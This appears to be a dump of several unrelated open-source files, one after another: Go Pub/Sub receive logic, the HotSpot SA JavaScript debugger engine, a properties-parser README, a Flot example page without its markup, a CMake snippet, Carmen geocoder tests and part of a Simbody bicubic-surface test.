trunc32(int64(maxCount)),\n\t\tackDeadline: config.AckDeadline,\n\t}\n\tfc := newFlowController(maxCount, maxBytes)\n\n\t// Wait for all goroutines started by Receive to return, so instead of an\n\t// obscure goroutine leak we have an obvious blocked call to Receive.\n\tgroup, gctx := errgroup.WithContext(ctx)\n\tfor i := 0; i < numGoroutines; i++ {\n\t\tgroup.Go(func() error {\n\t\t\treturn s.receive(gctx, po, fc, f)\n\t\t})\n\t}\n\treturn group.Wait()\n}\n\nfunc (s *Subscription) receive(ctx context.Context, po *pullOptions, fc *flowController, f func(context.Context, *Message)) error {\n\t// Cancel a sub-context when we return, to kick the context-aware callbacks\n\t// and the goroutine below.\n\tctx2, cancel := context.WithCancel(ctx)\n\t// Call stop when Receive's context is done.\n\t// Stop will block until all outstanding messages have been acknowledged\n\t// or there was a fatal service error.\n\t// The iterator does not use the context passed to Receive. If it did, canceling\n\t// that context would immediately stop the iterator without waiting for unacked\n\t// messages.\n\titer := newMessageIterator(context.Background(), s.s, s.name, po)\n\n\t// We cannot use errgroup from Receive here. Receive might already be calling group.Wait,\n\t// and group.Wait cannot be called concurrently with group.Go. We give each receive() its\n\t// own WaitGroup instead.\n\t// Since wg.Add is only called from the main goroutine, wg.Wait is guaranteed\n\t// to be called after all Adds.\n\tvar wg sync.WaitGroup\n\twg.Add(1)\n\tgo func() {\n\t\t<-ctx2.Done()\n\t\titer.stop()\n\t\twg.Done()\n\t}()\n\tdefer wg.Wait()\n\n\tdefer cancel()\n\tfor {\n\t\tmsgs, err := iter.receive()\n\t\tif err == io.EOF {\n\t\t\treturn nil\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor i, msg := range msgs {\n\t\t\tmsg := msg\n\t\t\t// TODO(jba): call acquire closer to when the message is allocated.\n\t\t\tif err := fc.acquire(ctx, len(msg.Data)); err != nil {\n\t\t\t\t// TODO(jba): test that these \"orphaned\" messages are nacked immediately when ctx is done.\n\t\t\t\tfor _, m := range msgs[i:] {\n\t\t\t\t\tm.Nack()\n\t\t\t\t}\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\twg.Add(1)\n\t\t\tgo func() {\n\t\t\t\t// TODO(jba): call release when the message is available for GC.\n\t\t\t\t// This considers the message to be released when\n\t\t\t\t// f is finished, but f may ack early or not at all.\n\t\t\t\tdefer wg.Done()\n\t\t\t\tdefer fc.release(len(msg.Data))\n\t\t\t\tf(ctx2, msg)\n\t\t\t}()\n\t\t}\n\t}\n}\n\n// TODO(jba): remove when we delete messageIterator.\ntype pullOptions struct {\n\tmaxExtension time.Duration\n\tmaxPrefetch int32\n\t// ackDeadline is the default ack deadline for the subscription. Not\n\t// configurable.\n\tackDeadline time.Duration\n}\n"} {"text": "/*\n * Copyright (c) 2004, 2012, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n *\n */\n\npackage sun.jvm.hotspot.utilities.soql;\n\nimport java.io.*;\nimport java.util.*;\nimport javax.script.Invocable;\nimport javax.script.ScriptContext;\nimport javax.script.ScriptEngine;\nimport javax.script.ScriptEngineManager;\nimport javax.script.ScriptException;\nimport sun.jvm.hotspot.debugger.*;\nimport sun.jvm.hotspot.oops.*;\nimport sun.jvm.hotspot.runtime.*;\nimport sun.jvm.hotspot.utilities.*;\nimport sun.jvm.hotspot.tools.*;\nimport sun.jvm.hotspot.tools.jcore.*;\nimport java.lang.reflect.Method;\nimport java.lang.reflect.Modifier;\n\n/**\n * Simple wrapper around jsr-223 JavaScript script engine.\n * In addition to wrapping useful functionality of jsr-223 engine,\n * this class exposed certain \"global\" functions to the script.\n */\npublic abstract class JSJavaScriptEngine extends MapScriptObject {\n /**\n * Start a read-eval-print loop with this engine.\n */\n public void startConsole() {\n start(true);\n }\n\n /**\n * Initialize the engine so that we can \"eval\" strings\n * and files later.\n */\n public void start() {\n start(false);\n }\n\n /**\n * Define a global function that invokes given Method.\n */\n public void defineFunction(Object target, Method method) {\n putFunction(target, method, false);\n }\n\n /**\n * Call the script function of given name passing the\n * given arguments.\n */\n public Object call(String name, Object[] args) {\n Invocable invocable = (Invocable)engine;\n try {\n return invocable.invokeFunction(name, args);\n } catch (RuntimeException re) {\n throw re;\n } catch (Exception exp) {\n throw new RuntimeException(exp);\n }\n }\n\n /**\n address function returns address of JSJavaObject as String. For other\n type of objects, the result is undefined.\n */\n public Object address(Object[] args) {\n if (args.length != 1) return UNDEFINED;\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return ((JSJavaObject)o).getOop().getHandle().toString();\n } else {\n return UNDEFINED;\n }\n }\n\n\n /**\n classof function gets type of given JSJavaInstance or JSJavaArray. Or\n given a string class name, this function gets the class object. For\n other type of objects, the result is undefined.\n */\n public Object classof(Object[] args) {\n if (args.length != 1) {\n return UNDEFINED;\n }\n Object o = args[0];\n if (o != null) {\n if (o instanceof JSJavaObject) {\n if (o instanceof JSJavaInstance) {\n return ((JSJavaInstance)o).getJSJavaClass();\n } else if (o instanceof JSJavaArray) {\n return ((JSJavaArray)o).getJSJavaClass();\n } else {\n return UNDEFINED;\n }\n } else if (o instanceof String) {\n InstanceKlass ik = SystemDictionaryHelper.findInstanceKlass((String) o);\n return getJSJavaFactory().newJSJavaKlass(ik).getJSJavaClass();\n } else {\n return UNDEFINED;\n }\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n * dumpClass function creates a .class file for a given Class object.\n * On success, returns true. Else, returns false. Second optional argument\n * specifies the directory in which .class content is dumped. This defaults\n * to '.'\n */\n public Object dumpClass(Object[] args) {\n if (args.length == 0) {\n return Boolean.FALSE;\n }\n Object clazz = args[0];\n if (clazz == null) {\n return Boolean.FALSE;\n }\n InstanceKlass ik = null;\n if (clazz instanceof String) {\n String name = (String) clazz;\n if (name.startsWith(\"0x\")) {\n // treat it as address\n VM vm = VM.getVM();\n Address addr = vm.getDebugger().parseAddress(name);\n Metadata metadata = Metadata.instantiateWrapperFor(addr.addOffsetTo(0));\n if (metadata instanceof InstanceKlass) {\n ik = (InstanceKlass) metadata;\n } else {\n return Boolean.FALSE;\n }\n } else {\n ik = SystemDictionaryHelper.findInstanceKlass((String) clazz);\n }\n } else if (clazz instanceof JSJavaClass) {\n JSJavaKlass jk = ((JSJavaClass)clazz).getJSJavaKlass();\n if (jk != null && jk instanceof JSJavaInstanceKlass) {\n ik = ((JSJavaInstanceKlass)jk).getInstanceKlass();\n }\n } else {\n return Boolean.FALSE;\n }\n\n if (ik == null) return Boolean.FALSE;\n StringBuffer buf = new StringBuffer();\n if (args.length > 1) {\n buf.append(args[1].toString());\n } else {\n buf.append('.');\n }\n\n buf.append(File.separatorChar);\n buf.append(ik.getName().asString().replace('/', File.separatorChar));\n buf.append(\".class\");\n String fileName = buf.toString();\n File file = new File(fileName);\n\n try {\n int index = fileName.lastIndexOf(File.separatorChar);\n File dir = new File(fileName.substring(0, index));\n dir.mkdirs();\n FileOutputStream fos = new FileOutputStream(file);\n ClassWriter cw = new ClassWriter(ik, fos);\n cw.write();\n fos.close();\n } catch (IOException exp) {\n printError(exp.toString(), exp);\n return Boolean.FALSE;\n }\n\n return Boolean.TRUE;\n }\n\n /**\n * dumpHeap function creates a heap dump file.\n * On success, returns true. Else, returns false.\n */\n public Object dumpHeap(Object[] args) {\n String fileName = \"heap.bin\";\n if (args.length > 0) {\n fileName = args[0].toString();\n }\n return new JMap().writeHeapHprofBin(fileName)? Boolean.TRUE: Boolean.FALSE;\n }\n\n /**\n help function prints help message for global functions and variables.\n */\n public void help(Object[] args) {\n println(\"Function/Variable Description\");\n println(\"================= ===========\");\n println(\"address(jobject) returns the address of the Java object\");\n println(\"classof(jobject) returns the class object of the Java object\");\n println(\"dumpClass(jclass,[dir]) writes .class for the given Java Class\");\n println(\"dumpHeap([file]) writes heap in hprof binary format\");\n println(\"help() prints this help message\");\n println(\"identityHash(jobject) returns the hashCode of the Java object\");\n println(\"mirror(jobject) returns a local mirror of the Java object\");\n println(\"load([file1, file2,...]) loads JavaScript file(s). With no files, reads \");\n println(\"object(string) converts a string address into Java object\");\n println(\"owner(jobject) returns the owner thread of this monitor or null\");\n println(\"sizeof(jobject) returns the size of Java object in bytes\");\n println(\"staticof(jclass, field) returns a static field of the given Java class\");\n println(\"read([prompt]) reads a single line from standard input\");\n println(\"quit() quits the interactive load call\");\n println(\"jvm the target jvm that is being debugged\");\n }\n\n /**\n identityHash function gets identity hash code value of given\n JSJavaObject. For other type of objects, the result is undefined.\n */\n public Object identityHash(Object[] args) {\n if (args.length != 1) return UNDEFINED;\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return new Long(((JSJavaObject)o).getOop().identityHash());\n } else {\n return UNDEFINED;\n }\n }\n\n\n /**\n * Load and execute a set of JavaScript source files.\n * This method is defined as a JavaScript function.\n */\n public void load(Object[] args) {\n for (int i = 0; i < args.length; i++) {\n processSource(args[i].toString());\n }\n }\n\n /**\n mirror function creats local copy of the Oop wrapper supplied.\n if mirror can not be created, return undefined. For other types,\n mirror is undefined.\n */\n public Object mirror(Object[] args) {\n Object o = args[0];\n Object res = UNDEFINED;\n if (o != null) {\n if (o instanceof JSJavaObject) {\n Oop oop = ((JSJavaObject)o).getOop();\n try {\n res = getObjectReader().readObject(oop);\n } catch (Exception e) {\n if (debug) e.printStackTrace(getErrorStream());\n }\n } else if (o instanceof JSMetadata) {\n Metadata metadata = ((JSMetadata)o).getMetadata();\n try {\n if (metadata instanceof InstanceKlass) {\n res = getObjectReader().readClass((InstanceKlass) metadata);\n }\n } catch (Exception e) {\n if (debug) e.printStackTrace(getErrorStream());\n }\n }\n }\n return res;\n }\n\n /**\n owner function gets owning thread of given JSJavaObjec, if any, else\n returns null. For other type of objects, the result is undefined.\n */\n public Object owner(Object[] args) {\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return getOwningThread((JSJavaObject)o);\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n object function takes a string address and returns a JSJavaObject.\n For other type of objects, the result is undefined.\n */\n public Object object(Object[] args) {\n Object o = args[0];\n if (o != null && o instanceof String) {\n VM vm = VM.getVM();\n Address addr = vm.getDebugger().parseAddress((String)o);\n Oop oop = vm.getObjectHeap().newOop(addr.addOffsetToAsOopHandle(0));\n return getJSJavaFactory().newJSJavaObject(oop);\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n sizeof function returns size of a Java object in bytes. For other type\n of objects, the result is undefined.\n */\n public Object sizeof(Object[] args) {\n if (args.length != 1) return UNDEFINED;\n Object o = args[0];\n if (o != null && o instanceof JSJavaObject) {\n return new Long(((JSJavaObject)o).getOop().getObjectSize());\n } else {\n return UNDEFINED;\n }\n }\n\n /**\n staticof function gets static field of given class. Both class and\n field name are specified as strings. undefined is returned if there is\n no such named field.\n */\n public Object staticof(Object[] args) {\n Object classname = args[0];\n Object fieldname = args[1];\n if (fieldname == null || classname == null ||\n !(fieldname instanceof String)) {\n return UNDEFINED;\n }\n\n InstanceKlass ik = null;\n if (classname instanceof JSJavaClass) {\n JSJavaClass jclass = (JSJavaClass) classname;\n JSJavaKlass jk = jclass.getJSJavaKlass();\n if (jk != null && jk instanceof JSJavaInstanceKlass) {\n ik = ((JSJavaInstanceKlass)jk).getInstanceKlass();\n }\n } else if (classname instanceof String) {\n ik = SystemDictionaryHelper.findInstanceKlass((String)classname);\n } else {\n return UNDEFINED;\n }\n\n if (ik == null) {\n return UNDEFINED;\n }\n JSJavaFactory factory = getJSJavaFactory();\n try {\n return ((JSJavaInstanceKlass) factory.newJSJavaKlass(ik)).getStaticFieldValue((String)fieldname);\n } catch (NoSuchFieldException e) {\n return UNDEFINED;\n }\n }\n\n /**\n * read function reads a single line of input from standard input\n */\n public Object read(Object[] args) {\n BufferedReader in = getInputReader();\n if (in == null) {\n return null;\n }\n if (args.length > 0) {\n print(args[0].toString());\n print(\":\");\n }\n try {\n return in.readLine();\n } catch (IOException exp) {\n exp.printStackTrace();\n throw new RuntimeException(exp);\n }\n }\n\n /**\n * Quit the shell.\n * This only affects the interactive mode.\n */\n public void quit(Object[] args) {\n quit();\n }\n\n public void writeln(Object[] args) {\n for (int i = 0; i < args.length; i++) {\n print(args[i].toString());\n print(\" \");\n }\n println(\"\");\n }\n\n public void write(Object[] args) {\n for (int i = 0; i < args.length; i++) {\n print(args[i].toString());\n print(\" \");\n }\n }\n\n //-- Internals only below this point\n protected void start(boolean console) {\n ScriptContext context = engine.getContext();\n OutputStream out = getOutputStream();\n if (out != null) {\n context.setWriter(new PrintWriter(out));\n }\n OutputStream err = getErrorStream();\n if (err != null) {\n context.setErrorWriter(new PrintWriter(err));\n }\n // load \"sa.js\" initialization file\n loadInitFile();\n // load \"~/jsdb.js\" (if found) to perform user specific\n // initialization steps, if any.\n loadUserInitFile();\n\n JSJavaFactory fac = getJSJavaFactory();\n JSJavaVM jvm = (fac != null)? fac.newJSJavaVM() : null;\n // call \"main\" function from \"sa.js\" -- main expects\n // 'this' object and jvm object\n call(\"main\", new Object[] { this, jvm });\n\n // if asked, start read-eval-print console\n if (console) {\n processSource(null);\n }\n }\n\n protected JSJavaScriptEngine(boolean debug) {\n this.debug = debug;\n ScriptEngineManager manager = new ScriptEngineManager();\n engine = manager.getEngineByName(\"javascript\");\n if (engine == null) {\n throw new RuntimeException(\"can't load JavaScript engine\");\n }\n Method[] methods = getClass().getMethods();\n for (int i = 0; i < methods.length; i++) {\n Method m = methods[i];\n if (! Modifier.isPublic(m.getModifiers())) {\n continue;\n }\n Class[] argTypes = m.getParameterTypes();\n if (argTypes.length == 1 &&\n argTypes[0] == Object[].class) {\n putFunction(this, m);\n }\n }\n }\n\n protected JSJavaScriptEngine() {\n this(false);\n }\n\n protected abstract ObjectReader getObjectReader();\n protected abstract JSJavaFactory getJSJavaFactory();\n protected void printPrompt(String str) {\n System.err.print(str);\n System.err.flush();\n }\n\n protected void loadInitFile() {\n InputStream is = JSJavaScriptEngine.class.getResourceAsStream(\"sa.js\");\n BufferedReader reader = new BufferedReader(new InputStreamReader(is));\n evalReader(reader, \"sa.js\");\n }\n\n protected void loadUserInitFile() {\n File initFile = new File(getUserInitFileDir(), getUserInitFileName());\n if (initFile.exists() && initFile.isFile()) {\n // load the init script\n processSource(initFile.getAbsolutePath());\n }\n }\n\n protected String getUserInitFileDir() {\n return System.getProperty(\"user.home\");\n }\n\n protected String getUserInitFileName() {\n return \"jsdb.js\";\n }\n\n protected BufferedReader getInputReader() {\n if (inReader == null) {\n inReader = new BufferedReader(new InputStreamReader(System.in));\n }\n return inReader;\n }\n\n protected PrintStream getOutputStream() {\n return System.out;\n }\n\n protected PrintStream getErrorStream() {\n return System.err;\n }\n\n protected void print(String name) {\n getOutputStream().print(name);\n }\n\n protected void println(String name) {\n getOutputStream().println(name);\n }\n\n protected void printError(String message) {\n printError(message, null);\n }\n\n protected void printError(String message, Exception exp) {\n getErrorStream().println(message);\n if (exp != null && debug) {\n exp.printStackTrace(getErrorStream());\n }\n }\n\n protected boolean isQuitting() {\n return quitting;\n }\n\n protected void quit() {\n quitting = true;\n }\n\n protected ScriptEngine getScriptEngine() {\n return engine;\n }\n\n private JSJavaThread getOwningThread(JSJavaObject jo) {\n Oop oop = jo.getOop();\n Mark mark = oop.getMark();\n ObjectMonitor mon = null;\n Address owner = null;\n JSJavaThread owningThread = null;\n // check for heavyweight monitor\n if (! mark.hasMonitor()) {\n // check for lightweight monitor\n if (mark.hasLocker()) {\n owner = mark.locker().getAddress(); // save the address of the Lock word\n }\n // implied else: no owner\n } else {\n // this object has a heavyweight monitor\n mon = mark.monitor();\n\n // The owner field of a heavyweight monitor may be NULL for no\n // owner, a JavaThread * or it may still be the address of the\n // Lock word in a JavaThread's stack. A monitor can be inflated\n // by a non-owning JavaThread, but only the owning JavaThread\n // can change the owner field from the Lock word to the\n // JavaThread * and it may not have done that yet.\n owner = mon.owner();\n }\n\n // find the owning thread\n if (owner != null) {\n JSJavaFactory factory = getJSJavaFactory();\n owningThread = (JSJavaThread) factory.newJSJavaThread(VM.getVM().getThreads().owningThreadFromMonitor(owner));\n }\n return owningThread;\n }\n\n /**\n * Evaluate JavaScript source.\n * @param filename the name of the file to compile, or null\n * for interactive mode.\n */\n private void processSource(String filename) {\n if (filename == null) {\n BufferedReader in = getInputReader();\n String sourceName = \"\";\n int lineno = 0;\n boolean hitEOF = false;\n do {\n int startline = lineno;\n printPrompt(\"jsdb> \");\n Object source = read(EMPTY_ARRAY);\n if (source == null) {\n hitEOF = true;\n break;\n }\n lineno++;\n Object result = evalString(source.toString(), sourceName, startline);\n if (result != null) {\n printError(result.toString());\n }\n if (isQuitting()) {\n // The user executed the quit() function.\n break;\n }\n } while (!hitEOF);\n } else {\n Reader in = null;\n try {\n in = new BufferedReader(new FileReader(filename));\n evalReader(in, filename);\n } catch (FileNotFoundException ex) {\n println(\"File '\" + filename + \"' not found\");\n throw new RuntimeException(ex);\n }\n }\n }\n\n protected Object evalString(String source, String filename, int lineNum) {\n try {\n engine.put(ScriptEngine.FILENAME, filename);\n return engine.eval(source);\n } catch (ScriptException sexp) {\n printError(sexp.toString(), sexp);\n } catch (Exception exp) {\n printError(exp.toString(), exp);\n }\n return null;\n }\n\n private Object evalReader(Reader in, String filename) {\n try {\n engine.put(ScriptEngine.FILENAME, filename);\n return engine.eval(in);\n } catch (ScriptException sexp) {\n System.err.println(sexp);\n printError(sexp.toString(), sexp);\n } finally {\n try {\n in.close();\n } catch (IOException ioe) {\n printError(ioe.toString(), ioe);\n }\n }\n return null;\n }\n\n // lazily initialized input reader\n private BufferedReader inReader;\n // debug mode or not\n protected final boolean debug;\n private boolean quitting;\n // underlying jsr-223 script engine\n private ScriptEngine engine;\n}\n"} {"text": "# node-properties-parser\n\nA parser for [.properties](http://en.wikipedia.org/wiki/.properties) files written in javascript. Properties files store key-value pairs. They are typically used for configuration and internationalization in Java applications as well as in Actionscript projects. Here's an example of the format:\n\n\t# You are reading the \".properties\" entry.\n\t! The exclamation mark can also mark text as comments.\n\twebsite = http://en.wikipedia.org/\n\tlanguage = English\n\t# The backslash below tells the application to continue reading\n\t# the value onto the next line.\n\tmessage = Welcome to \\\n\t Wikipedia!\n\t# Add spaces to the key\n\tkey\\ with\\ spaces = This is the value that could be looked up with the key \"key with spaces\".\n\t# Unicode\n\ttab : \\u0009\n*(taken from [Wikipedia](http://en.wikipedia.org/wiki/.properties#Format))*\n\nCurrently works with any version of node.js.\n\n## The API\n\n- `parse(text)`: Parses `text` into key-value pairs. Returns an object containing the key-value pairs.\n- `read(path[, callback])`: Opens the file specified by `path` and calls `parse` on its content. If the optional `callback` parameter is provided, the result is then passed to it as the second parameter. If an error occurs, the error object is passed to `callback` as the first parameter. If `callback` is not provided, the file specified by `path` is synchronously read and calls `parse` on its contents. The resulting object is immediately returned.\n- `createEditor([path[, callback]])`: If neither `path` or `callback` are provided an empty editor object is returned synchronously. If only `path` is provided, the file specified by `path` is synchronously read and parsed. An editor object with the results in then immediately returned. If both `path` and `callback` are provided, the file specified by `path` is read and parsed asynchronously. An editor object with the results are then passed to `callback` as the second parameters. If an error occurs, the error object is passed to `callback` as the first parameter.\n- `Editor`: The editor object is returned by `createEditor`. Has the following API:\n\t- `get(key)`: Returns the value currently associated with `key`.\n\t- `set(key, [value[, comment]])`: Associates `key` with `value`. An optional comment can be provided. If `value` is not specified or is `null`, then `key` is unset.\n\t- `unset(key)`: Unsets the specified `key`.\n\t- `save([path][, callback]])`: Writes the current contents of this editor object to a file specified by `path`. If `path` is not provided, then it'll be defaulted to the `path` value passed to `createEditor`. The `callback` parameter is called when the file has been written to disk.\n\t- `addHeadComment`: Added a comment to the head of the file.\n\t- `toString`: Returns the string representation of this properties editor object. This string will be written to a file if `save` is called.\n\n## Getting node-properties-parser\n\nThe easiest way to get node-properties-parser is with [npm](http://npmjs.org/):\n\n\tnpm install properties-parser\n\nAlternatively you can clone this git repository:\n\n\tgit://github.com/xavi-/node-properties-parser.git\n\n## Developed by\n* Xavi Ramirez\n\n## License\nThis project is released under [The MIT License](http://www.opensource.org/licenses/mit-license.php)."} {"text": "\n\n\n\t\n\tFlot Examples: Adding Annotations\n\t\n\t\n\t\n\t\n\t\n\n\n\n\t
\n\t\t

Adding Annotations

\n\t
\n\n\t
\n\n\t\t
\n\t\t\t
\n\t\t
\n\n\t\t

Flot has support for simple background decorations such as lines and rectangles. They can be useful for marking up certain areas. You can easily add any HTML you need with standard DOM manipulation, e.g. for labels. For drawing custom shapes there is also direct access to the canvas.

\n\n\t
\n\n\t
\n\t\tCopyright © 2007 - 2014 IOLA and Ole Laursen\n\t
\n\n\n\n"} {"text": "\nset(_compiler_id_pp_test \"defined(__IBMCPP__) && !defined(__COMPILER_VER__) && __IBMCPP__ >= 800\")\n\ninclude(\"${CMAKE_CURRENT_LIST_DIR}/IBMCPP-CXX-DetermineVersionInternal.cmake\")\n"} {"text": "'use strict';\n// Test geocoder_tokens\n\nconst tape = require('tape');\nconst Carmen = require('../..');\nconst mem = require('../../lib/sources/api-mem');\nconst queue = require('d3-queue').queue;\nconst addFeature = require('../../lib/indexer/addfeature'),\n queueFeature = addFeature.queueFeature,\n buildQueued = addFeature.buildQueued;\n\n(() => {\n const conf = {\n country: new mem({ maxzoom: 6 }, () => {}),\n place: new mem({ maxzoom: 6 }, () => {})\n };\n\n const c = new Carmen(conf);\n tape('index country - United States', (t) => {\n queueFeature(conf.country, {\n id: 1,\n properties: {\n 'carmen:text':'United States',\n 'carmen:center': [0,0],\n 'carmen:zxy': ['6/32/32']\n }\n }, t.end);\n });\n\n tape('index country - United Kingdom', (t) => {\n queueFeature(conf.country, {\n id: 2,\n properties: {\n 'carmen:text':'United Kingdom',\n 'carmen:center': [0, 1],\n 'carmen:zxy': ['6/32/32']\n }\n }, t.end);\n });\n\n tape('index places in the United States', (t) => {\n const q = queue(1);\n for (let i = 1; i <= 11; i++) q.defer((i, done) => {\n queueFeature(conf.place, {\n id:i,\n properties: {\n 'carmen:text':'place ' + i,\n 'carmen:center': [0,0],\n },\n geometry: {\n type: 'Point',\n coordinates: [0,0]\n }\n }, done);\n }, i);\n q.awaitAll(t.end);\n });\n\n tape('index place 1 in United Kingdom', (t) => {\n queueFeature(conf.place, {\n id: 50,\n properties: {\n 'carmen:text':'place 1',\n 'carmen:center': [0,1],\n },\n geometry: {\n type: 'Point',\n coordinates: [0,1]\n }\n }, t.end);\n });\n\n tape('build queued features', (t) => {\n const q = queue();\n Object.keys(conf).forEach((c) => {\n q.defer((cb) => {\n buildQueued(conf[c], cb);\n });\n });\n q.awaitAll(t.end);\n });\n\n tape('max_correction_length > query length', (t) => {\n // Number of words in the query = 6\n // parameterized max_correction_length = 5\n // this test case should not return results because we should not attempt fuzzy search\n // for a query whose length is greater than the max_correction_length\n c.geocode('place places 11 unitted states america however extreme', { max_correction_length: 0 }, (err, res) => {\n t.ifError(err);\n t.equals(res.features[0].relevance < 0.6, true, 'ok, returns a feature with relevance < 0.6');\n t.end();\n });\n });\n\n tape('max_correction_length <= query length', (t) => {\n // Number of words in the query = 6\n // default max_correction_length = 8\n // this test case should return results because we attempt fuzzy search\n // for a query whose length <= max_correction_length\n c.geocode('places places 11 unitted states america', { }, (err, res) => {\n t.ifError(err);\n t.deepEquals(res.features[0].place_name, 'place 11, United States', 'ok, returns a result when max_correction_length <= query length');\n t.end();\n });\n });\n\n tape('verifymatch_stack_limit=1', (t) => {\n // providing parameter verifymatch_stack_limit=1 reduces the number of indexes sent to VerifyMatch\n // only returns place 1 from the United States\n c.geocode('place 1 united', { autocomplete: true, verifymatch_stack_limit: 1 }, (err, res) => {\n t.ifError(err);\n t.deepEquals(res.features[0].place_name, 'place 1, United States', 'returns place 1 from United States');\n t.deepEquals(res.features[0].center, [0,0], 'Center for place 1 from United States');\n t.error(res.features[1], undefined, 'Does not include place 1 from United Kingdom');\n t.end();\n });\n });\n\n tape('verifymatch_stack_limit > 1', (t) => {\n // providing parameter verifymatch_stack_limit > 1 increases the number of indexes to verifymatch\n c.geocode('place 1 united', { autocomplete: true, verifymatch_stack_limit: 30 }, (err, res) => {\n t.ifError(err);\n t.deepEquals(res.features[0].place_name, 'place 1, United States', 'returns place 1 from United States');\n t.deepEquals(res.features[0].center, [0,0], 'Center for place 1 from United States');\n t.deepEquals(res.features[1].center, [0,1], 'Includes results for id.112 place 1');\n t.end();\n });\n });\n})();\n"} {"text": "/* -------------------------------------------------------------------------- *\n * Simbody(tm): SimTKmath *\n * -------------------------------------------------------------------------- *\n * This is part of the SimTK biosimulation toolkit originating from *\n * Simbios, the NIH National Center for Physics-Based Simulation of *\n * Biological Structures at Stanford, funded under the NIH Roadmap for *\n * Medical Research, grant U54 GM072970. See https://simtk.org/home/simbody. *\n * *\n * Portions copyright (c) 2011-12 Stanford University and the Authors. *\n * Authors: Matthew Millard *\n * Contributors: Michael Sherman *\n * *\n * Licensed under the Apache License, Version 2.0 (the \"License\"); you may *\n * not use this file except in compliance with the License. You may obtain a *\n * copy of the License at http://www.apache.org/licenses/LICENSE-2.0. *\n * *\n * Unless required by applicable law or agreed to in writing, software *\n * distributed under the License is distributed on an \"AS IS\" BASIS, *\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *\n * See the License for the specific language governing permissions and *\n * limitations under the License. *\n * -------------------------------------------------------------------------- */\n\n#include \"SimTKmath.h\"\n\n// Include the private implementation class declaration for testing purposes;\n// this is not part of the API.\n#include \"../src/BicubicSurface_Guts.h\"\n\n\n#include \n#include \n#include \n\nusing namespace SimTK;\nusing namespace std;\n\n/**\nThis function computes a standard central difference dy/dx. \nIf extrap_endpoints is set to 1, then the derivative at the end points \nis estimated by linearly extrapolating the dy/dx values beside the end points\n\n @param x domain vector\n @param y range vector\n @param extrap_endpoints:(false) Endpoints of the returned vector will be zero, \n because a central difference is undefined at \n these endpoints\n (true) Endpoints are computed by linearly \n extrapolating using a first difference from \n the neighboring 2 points\n\n @returns dy/dx computed using central differences\n*/\nVector getCentralDifference(Vector x, Vector y, bool extrap_endpoints) {\n Vector dy(x.size());\n Real dx1,dx2;\n Real dy1,dy2;\n int size = x.size();\n for(int i=1; i fx(1); //Arguments required to get the correct derivative \n Array_ fy(1); // from the calcDerivatie interface\n Array_ fxy(ifxy,ifxy+2);\n Array_ fxx(ifxx,ifxx+2);\n Array_ fyy(ifyy,ifyy+2);\n Array_ fxxx(ifxxx,ifxxx+3);\n Array_ fyyy(ifyyy,ifyyy+3);\n Array_ fxxy(ifxxy,ifxxy+3);\n Array_ fxyy(ifxyy,ifxyy+3); \n\n fx[0] =0;\n fy[0] =1;\n\n errV = 0;\n errVM = 0;\n\n Matrix fk(size,size),fxk(size,size),fyk(size,size);\n Matrix fxyk(size,size),fxxk(size,size),fyyk(size,size);\n Matrix fxxyk(size,size),fxyyk(size,size);\n Matrix fxxxk(size,size),fyyyk(size,size);\n\n Matrix fMk(size-1,size-1),fxMk(size-1,size-1),fyMk(size-1,size-1);\n Matrix fxyMk(size-1,size-1),fxxMk(size-1,size-1),fyyMk(size-1,size-1);\n Matrix fxxyMk(size-1,size-1),fxyyMk(size-1,size-1);\n Matrix fxxxMk(size-1,size-1),fyyyMk(size-1,size-1);\n\n for(int i=0; i 1e-4 ){\n printf(\"Analytic (x,y),f,fx,fy,fxy: (%g,%g),%g, %g, %g, %g\\n\",\n x(i),y(j),z(i,j),zx(i,j),zy(i,j),zxy(i,j));\n printf(\"Approx. (x,y),f,fx,fy,fxy: (%g,%g),%g, %g, %g, %g\\n\\n\",\n x(i),y(j),fk(i,j),fxk(i,j),fyk(i,j),fxyk(i,j));\n bcs.setDebug(true);\n }*/\n\n if(i fT, aV, fV, fVerr;\n Mat<16,16> AM(A), ATest;\n\n //Initialize the grid\n for(int i=0; i derivX(1);\n Array_ derivY(1);\n Array_ derivXY(2);\n Array_ derivXX(2);\n Array_ derivYY(2);\n Array_ derivXXY(3);\n Array_ derivXYY(3);\n Array_ derivXXX(3);\n Array_ derivYYY(3);\n Array_ deriv4X(4);\n Array_ deriv4Y(4);\n\n derivX[0] = 0;\n derivY[0] = 1;\n derivXY[0]= 0;\n derivXY[1]= 1;\n derivXX[0]= 0;\n derivXX[1]= 0;\n derivYY[0]= 1;\n derivYY[1]= 1;\n derivXXY[0]= 0;\n derivXXY[1]= 0;\n derivXXY[2]= 1;\n derivXYY[0]= 0;\n derivXYY[1]= 1;\n derivXYY[2]= 1;\n derivXXX[0]= 0;\n derivXXX[1]= 0;\n derivXXX[2]= 0;\n derivYYY[0]= 1;\n derivYYY[1]= 1;\n derivYYY[2]= 1;\n for(int i=0;i<4;i++){\n deriv4X[i]=0;\n deriv4Y[i]=1;\n }\n\n //Function computed derivatives\n Matrix bcsF(tsize,tsize), bcsFx(tsize,tsize), bcsFy(tsize,tsize);\n Matrix bcsFxy(tsize,tsize), bcsFxx(tsize,tsize), bcsFyy(tsize,tsize);\n Matrix bcsFxxy(tsize,tsize), 